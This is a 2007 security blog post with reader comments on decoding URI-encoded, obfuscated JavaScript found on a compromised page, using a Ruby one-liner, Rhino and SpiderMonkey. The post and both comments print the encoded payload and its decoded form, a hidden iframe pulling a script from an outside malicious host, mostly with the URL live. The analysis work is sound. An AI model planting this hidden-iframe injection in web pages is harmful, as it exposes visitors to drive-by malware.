Friday, November 02, 2007

Ruby snippet for URI decoding

Ruby Module URI::Escape

I was doing some quick analysis of a page that had some obfuscated JavaScript containing URI-encoded text. Usually, I pull out the JavaScript and run it through SpiderMonkey (or Didier Stevens' modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for encoding and decoding hex, URI, binary and similar formats.

So, I took this opportunity to figure out the Ruby for deobfuscating something like this:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e
%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66
%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73
%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35
%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64
%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69
%66%72%61%6d%65%3e%27%29"));

Running this:
ruby -e 'require "uri"; p URI.unescape("<junk_from_above>")'

returns this:
"window.status='Done';document.write('<iframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'></iframe>')"

2 comments:

PaulM said...

Another tool for playing with malicious or obfuscated JavaScript that I like is the Rhino JavaScript shell.

$ bin/java -classpath rhino1_6R7/js.jar org.mozilla.javascript.tools.shell.Main
Rhino 1.6 release 7 2007 08 19
js> unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64
%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%6
5%3d%39%61%37%62%34%37%32%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%
76%65%6d%79%6c%6f%76%65%73%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d
%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35%3
2%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64%74%68%3d%32%30%
31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79
%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")
window.status='Done';document.write('<iframe name=9a7b4722 src=\'hxxp://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\' width=201 height=76 style=\'display: none\'></iframe>')

js>


http://www.mozilla.org/rhino/

It's command-line fast & easy, but also gives you an environment to play with the code in (for instance, changing document.write to print)

John H. Sawyer said...

Thanks, Paul. I've tried Rhino but prefer the speed of SpiderMonkey. They're the same JavaScript engine, but SpiderMonkey is written in C while Rhino is in Java--it has the same CLI functionality and environment to play in.

mezzanine:~ jsawyer$ js -v
JavaScript-C 1.6 2006-11-19
usage: js [-PswWxC] [-b branchlimit] [-c stackchunksize] [-v version] [-f scriptfile] [-e script] [-S maxstacksize] [scriptfile] [scriptarg...]
mezzanine:~ jsawyer$ js
js> unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29");
window.status='Done';document.write('<iframe name=9a7b4722 src=\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\' width=201 height=76 style=\'display: none\'></iframe>')

Also, the modified SpiderMonkey by Didier Stevens that I mentioned doesn't require you to manually modify the code for document.write's and eval's. When you run it, it will automatically write the content to the respective files.

mezzanine:tmp jsawyer$ js-1.5-didier poo
poo:1: ReferenceError: window is not defined
mezzanine:tmp jsawyer$ cat eval.001.log
window.status='Done';document.write('<iframe name=9a7b4722 src=\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\' width=201 height=76 style=\'display: none\'></iframe>')

Do you know if there are any enhancements to Rhino that are not in SpiderMonkey? I noticed it has a much newer build date.